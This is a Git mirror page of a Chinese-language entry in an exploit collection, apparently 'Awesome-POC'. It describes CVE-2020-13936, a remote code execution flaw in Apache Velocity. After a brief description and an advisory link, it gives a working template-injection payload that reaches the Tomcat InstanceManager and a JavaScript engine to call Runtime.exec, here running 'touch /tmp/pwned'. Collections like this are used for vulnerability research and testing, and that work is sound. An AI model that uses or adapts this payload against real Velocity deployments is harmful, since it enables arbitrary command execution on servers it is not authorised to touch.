admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Velocity 远程代码执行 CVE-2020-13936.md
Threekiii 9acf184afd 更新漏洞
2022-12-06 17:17:54 +08:00

19 lines
685 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache Velocity 远程代码执行 CVE-2020-13936
## 漏洞描述
Velocity Uberspector无法阻止访问java.lang.ClassLoader类加载器方法。在VelocityView的上下文中使用Velocity模板时能够修改模版的攻击者可以使用与运行Servlet容器的帐户相同的权限执行任意Java代码或运行任意系统命令。
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity
## 漏洞复现
poc
```
${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval("java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')")}
```
Reference in New Issue View Git Blame Copy Permalink